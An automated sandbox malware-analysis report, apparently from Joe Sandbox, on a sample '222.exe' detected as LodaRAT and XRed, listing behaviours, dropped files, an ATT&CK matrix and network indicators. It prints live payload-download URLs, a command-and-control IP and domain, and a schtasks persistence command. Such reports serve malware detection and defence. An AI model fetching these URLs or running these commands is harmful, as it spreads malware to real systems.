                              Source: Amcache.hve.20.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.20.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.20.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Users\user\Desktop\._cache_222.exeAPI call chain: ExitProcess graph end nodegraph_2-104780
                              Source: C:\Users\user\Desktop\._cache_222.exeAPI call chain: ExitProcess graph end nodegraph_2-106288
                              Source: C:\Users\user\Desktop\._cache_222.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B703C BlockInput,2_2_007B703C
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0076374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0076374E
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007946D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_007946D0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_008CB0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_008CB0C0
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0078A937 GetProcessHeap,2_2_0078A937
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00788E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00788E3C
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00788E19 SetUnhandledExceptionFilter,2_2_00788E19
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00468E19 SetUnhandledExceptionFilter,9_2_00468E19
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_00468E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00468E3C
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079BE95 LogonUserW,2_2_0079BE95
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0076374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0076374E
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A4B52 SendInput,keybd_event,2_2_007A4B52
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007A7DD5 mouse_event,2_2_007A7DD5
                              Source: C:\Users\user\Desktop\222.exeProcess created: C:\Users\user\Desktop\._cache_222.exe "C:\Users\user\Desktop\._cache_222.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\222.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_0079B398
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0079BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_0079BE31
                              Source: ._cache_222.exe, EWZJGF.exeBinary or memory string: Shell_TrayWnd
                              Source: ._cache_222.exe, 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp, EWZJGF.exe, 00000009.00000002.2118796035.00000000004EE000.00000040.00000001.01000000.00000009.sdmp, EWZJGF.exe, 0000000C.00000002.2168554745.00000000004EE000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00787254 cpuid 2_2_00787254
                              Source: C:\Users\user\Desktop\222.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007840DA GetSystemTimeAsFileTime,__aulldiv,2_2_007840DA
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007DC146 GetUserNameW,2_2_007DC146
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_00792C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00792C3C
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_0077E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0077E47B
                              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: ._cache_222.exe, 00000002.00000002.3265916885.00000000011D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\Desktop\._cache_222.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected LodaRAT
                              Source: Yara matchFile source: Process Memory Space: ._cache_222.exe PID: 6036, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: 222.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.222.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 222.exe PID: 4616, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6192, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX6FEC.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: ._cache_222.exe, 00000002.00000002.3273139948.00000000044A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81B
                              Source: EWZJGF.exe, 00000015.00000002.2702247825.00000000004EE000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: EWZJGF.exe, 00000010.00000003.2422688024.0000000004D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                              Source: EWZJGF.exeBinary or memory string: WIN_XP
                              Source: EWZJGF.exeBinary or memory string: WIN_XPe
                              Source: EWZJGF.exe, 00000015.00000002.2706925277.000000000467B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81e
                              Source: EWZJGF.exeBinary or memory string: WIN_VISTA
                              Source: EWZJGF.exeBinary or memory string: WIN_7
                              Source: EWZJGF.exeBinary or memory string: WIN_8
                              Source: Yara matchFile source: Process Memory Space: ._cache_222.exe PID: 6036, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Yara detected LodaRAT
                              Source: Yara matchFile source: Process Memory Space: ._cache_222.exe PID: 6036, type: MEMORYSTR
                              Yara detected XRed
                              Source: Yara matchFile source: 222.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.222.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 222.exe PID: 4616, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6192, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX6FEC.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_007B91DC
                              Source: C:\Users\user\Desktop\._cache_222.exeCode function: 2_2_007B96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_007B96E2
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004991DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_004991DC
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeCode function: 9_2_004996E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_004996E2

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information421
                              Scripting                              		2
                              Valid Accounts                              		11
                              Windows Management Instrumentation                              		421
                              Scripting                              		1
                              Exploitation for Privilege Escalation                              		1
                              Disable or Modify Tools                              		21
                              Input Capture                              		2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		4
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomains1
                              Replication Through Removable Media                              		1
                              Native API                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory1
                              Peripheral Device Discovery                              		Remote Desktop Protocol21
                              Input Capture                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              Extra Window Memory Injection                              		21
                              Obfuscated Files or Information                              		Security Account Manager1
                              Account Discovery                              		SMB/Windows Admin Shares3
                              Clipboard Data                              		3
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Scheduled Task/Job                              		2
                              Valid Accounts                              		1
                              Software Packing                              		NTDS4
                              File and Directory Discovery                              		Distributed Component Object ModelInput Capture34
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd21
                              Registry Run Keys / Startup Folder                              		21
                              Access Token Manipulation                              		1
                              DLL Side-Loading                              		LSA Secrets38
                              System Information Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                              Process Injection                              		1
                              Extra Window Memory Injection                              		Cached Domain Credentials1
                              Query Registry                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                              Scheduled Task/Job                              		112
                              Masquerading                              		DCSync151
                              Security Software Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                              Registry Run Keys / Startup Folder                              		2
                              Valid Accounts                              		Proc Filesystem21
                              Virtualization/Sandbox Evasion                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                              Virtualization/Sandbox Evasion                              		/etc/passwd and /etc/shadow3
                              Process Discovery                              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                              Access Token Manipulation                              		Network Sniffing11
                              Application Window Discovery                              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                              Process Injection                              		Input Capture1
                              System Owner/User Discovery                              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582332 Sample: 222.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 51 freedns.afraid.org 2->51 53 xred.mooo.com 2->53 55 2 other IPs or domains 2->55 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 73 19 other signatures 2->73 9 222.exe 1 6 2->9         started        12 EWZJGF.exe 2->12         started        15 EXCEL.EXE 226 67 2->15         started        17 5 other processes 2->17 signatures3 71 Uses dynamic DNS services 51->71 process4 file5 43 C:\Users\user\Desktop\._cache_222.exe, PE32 9->43 dropped 45 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->45 dropped 47 C:\ProgramData\Synaptics\RCX6FEC.tmp, PE32 9->47 dropped 49 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->49 dropped 19 ._cache_222.exe 2 5 9->19         started        24 Synaptics.exe 85 9->24         started        87 Multi AV Scanner detection for dropped file 12->87 89 Machine Learning detection for dropped file 12->89 signatures6 process7 dnsIp8 57 172.111.138.100, 49733, 49787, 49895 VOXILITYGB United States 19->57 37 C:\Users\user\AppData\Roaming\...WZJGF.exe, PE32 19->37 dropped 39 C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, ASCII 19->39 dropped 75 Multi AV Scanner detection for dropped file 19->75 77 Machine Learning detection for dropped file 19->77 26 cmd.exe 19->26         started        29 wscript.exe 19->29         started        59 docs.google.com 142.250.186.110, 443, 49709, 49710 GOOGLEUS United States 24->59 61 drive.usercontent.google.com 142.250.186.33, 443, 49716, 49717 GOOGLEUS United States 24->61 63 freedns.afraid.org 69.42.215.252, 49712, 80 AWKNET-LLCUS United States 24->63 41 C:\Users\user\DocumentsEGWXUHVUG\~$cache1, PE32 24->41 dropped 79 Antivirus detection for dropped file 24->79 81 Drops PE files to the document folder of the user 24->81 31 WerFault.exe 24->31         started        file9 signatures10 process11 signatures12 83 Uses schtasks.exe or at.exe to add and modify task schedules 26->83 33 conhost.exe 26->33         started        35 schtasks.exe 26->35         started        85 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->85 process13

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              222.exe86%VirustotalBrowse
                              222.exe92%ReversingLabsWin32.Trojan.Synaptics
                              222.exe100%AviraTR/Dldr.Agent.SH
                              222.exe100%AviraW2000M/Dldr.Agent.17651006
                              222.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\EEGWXUHVUG\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\EEGWXUHVUG\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\AppData\Local\Temp\HBMQLS.vbs100%AviraVBS/Runner.VPJI
                              C:\ProgramData\Synaptics\RCX6FEC.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCX6FEC.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Desktop\._cache_222.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\Users\user\Documents\EEGWXUHVUG\~$cache1100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX6FEC.tmp100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX6FEC.tmp92%ReversingLabsWin32.Worm.Zorex
                              C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                              C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe55%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\Desktop\._cache_222.exe55%ReversingLabsWin32.Trojan.Lisk
                              C:\Users\user\Documents\EEGWXUHVUG\~$cache192%ReversingLabsWin32.Worm.Zorex

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://xred.site50.net/syn/SSLLibrary.dlp100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SUpdate.iniH)O100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		142.250.186.110
                                		truefalse
                                  		high
                                  drive.usercontent.google.com
                                  		142.250.186.33
                                  		truefalse
                                    		high
                                    xred.mooo.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      xred.mooo.comfalse
                                        		high
                                        http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1RCX6FEC.tmp.0.drfalse
                                              		high
                                              https://drive.usercontent.google.com/dSynaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://docs.google.com/google.com/mSynaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://docs.google.com/0Synaptics.exe, 00000003.00000002.2660885130.000000000F1DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://docs.google.com/x-cn.comSynaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://docs.google.com/0liSynaptics.exe, 00000003.00000002.2660885130.000000000F1DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://docs.google.com/oogle.deSynaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.usercontent.google.com/ZSynaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://ip-score.com/checkip/Kw._cache_222.exe, 00000002.00000002.3272917400.000000000443D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://upx.sf.netAmcache.hve.20.drfalse
                                                                    		high
                                                                    http://xred.site50.net/syn/Synaptics.rarRCX6FEC.tmp.0.drfalse
                                                                      		high
                                                                      https://docs.google.com/T3Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.com/Synaptics.exe, 00000003.00000002.2660885130.000000000F1DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://drive.usercontent.google.com/d&Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1RCX6FEC.tmp.0.drfalse
                                                                                  		high
                                                                                  https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1~DF6A3EB0BE5C6F998C.TMP.4.drfalse
                                                                                    		high
                                                                                    https://docs.google.com/napps.cnSynaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://docs.google.com/ject.org.cnSynaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://xred.site50.net/syn/SUpdate.iniRCX6FEC.tmp.0.drfalse
                                                                                              		high
                                                                                              http://xred.site50.net/syn/SSLLibrary.dlp222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://docs.google.com/google.com/.dartsearch-cn.netSynaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://docs.google.com/CompanySynaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://xred.site50.net/syn/SUpdate.iniH)O222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.2685377013.0000000016ABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2689765064.00000000193FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2681827874.00000000142BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2653853811.000000000D63E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2708465947.0000000021C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2675328024.00000000119FE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://docs.google.com/&0pN%Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978:Synaptics.exe, 00000003.00000002.2635210008.00000000006BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://docs.google.com/.google.com.brSynaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://xred.site50.net/syn/SSLLibrary.dllRCX6FEC.tmp.0.drfalse
                                                                                                              		high
                                                                                                              https://docs.google.com/comSynaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  142.250.186.110
                                                                                                                  		docs.google.comUnited States
                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                  172.111.138.100
                                                                                                                  		unknownUnited States
                                                                                                                  		3223VOXILITYGBtrue
                                                                                                                  142.250.186.33
                                                                                                                  		drive.usercontent.google.comUnited States
                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                  69.42.215.252
                                                                                                                  		freedns.afraid.orgUnited States
                                                                                                                  		17048AWKNET-LLCUSfalse

                                                                                                                  General Information

                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1582332
                                                                                                                  Start date and time:2024-12-30 11:22:07 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 10m 0s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:22
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:222.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.expl.evad.winEXE@20/59@10/4
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 88
                                                                                                                  • Number of non-executed functions: 286
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
